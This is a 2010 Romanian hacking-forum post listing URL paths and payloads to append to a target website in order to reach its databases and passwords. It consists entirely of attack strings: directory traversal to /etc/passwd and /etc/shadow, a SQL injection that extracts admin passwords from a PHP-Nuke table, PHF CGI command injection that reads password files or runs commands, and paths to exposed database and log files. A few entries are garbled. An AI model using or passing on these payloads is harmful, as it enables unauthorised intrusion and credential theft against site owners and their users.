tunnel123456 Posted November 20, 2010 Report Posted November 20, 2010 Dork-uri la site-uri care sunt vulnerabile si se poate afla parola, baza de dateEX: Sa zicem ca site asta site.ro urmat de unul din dork-urile de mai jos, puteti afla avea acces pe site, baza de date, parole etc./login.php?login_ok=1/admin/files.php/db_lookup.php/userpwd.txt/adminpanel/phpmydump.php/inc/mysql.inc/admin/db_lookup.php/userpwd.txt/index.php?page=../../../../../../../etc/passwd/index.php?file=../../../../../../../../etc/passwd%00/index.php?page=../../../../../../../etc/shadow/index.php?page=../../../../../../../etc/group/index.php?page=../../../../../../../etc/security/group/index.php?page=../../../../../../../etc/security/passwd/index.php?page=../../../../../../../etc/security/user/index.php?page=../../../../../../../etc/security/environ/index.php?page=../../../../../../../etc/security/limits/modules.php?name=Search&type=comments&%20%20%20query=loquesea&instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd/cgi-bin/phf?Qalias=x%0a/bin/pycat%20passwd/cgi-bin/phf>Qalias=x%0a/usr/bin/id/cgi-bin/phf?Qalias=x%0als%20-al%20/etc/pass*/cgi-bin/phf?Qalias=x%0apasswd%20root/cgi-bin/finger/_private/database.mbd/backend/xxx.asp/aspcart5.mdb/cart.cgi/cartmanager.cgi/cgi-bin/Admin_files//web_store.cgi/Admin_files/order.log/cgi-bin/Ya..../etc/passwd%00By.Smenaru4u Quote